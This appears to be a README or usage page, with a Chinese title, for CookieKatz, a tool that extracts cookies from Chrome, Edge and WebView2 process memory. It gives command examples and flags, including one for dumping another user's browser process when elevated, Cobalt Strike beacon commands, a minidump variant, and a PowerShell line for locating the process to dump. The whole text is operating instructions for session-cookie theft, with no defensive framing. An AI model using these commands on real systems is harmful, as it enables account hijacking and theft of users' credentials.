从 Chrome和 Edge 进程内存转储 cookie

Examples:.CookieKatz.exe    By default targets first available Chrome process.CookieKatz.exe /edge    Targets first available Edge process.CookieKatz.exe /pid:<pid>    Attempts to target given pid, expecting it to be Chrome.CookieKatz.exe /webview /pid:<pid>    Targets the given msedgewebview2 process.CookieKatz.exe /list /webview    Lists available webview processes
Flags:    /edge       Target current user Edge process    /webview    Target current user Msedgewebview2 process    /pid        Attempt to dump given pid, for example, someone else's if running elevated    /list       List targettable processes, use with /edge or /webview to target other browsers    /help       This what you just did! -h works as well

beacon> help cookie-katzDump cookies from Chrome or EdgeUse: cookie-katz [chrome|edge|webview] [pid]
beacon> help cookie-katz-findFind processes for Cookie-Katz
Use: cookie-katz-find [chrome|edge|webview]

Usage:    CookieKatzMinidump.exe <Path_to_minidump_file>
Example:    .CookieKatzMinidump.exe .msedge.DMP
To target correct process for creating the minidump, you can use the following PowerShell command:    Get-WmiObject Win32_Process | where {$_.CommandLine -match 'network.mojom.NetworkService'} | select -Property Name,ProcessId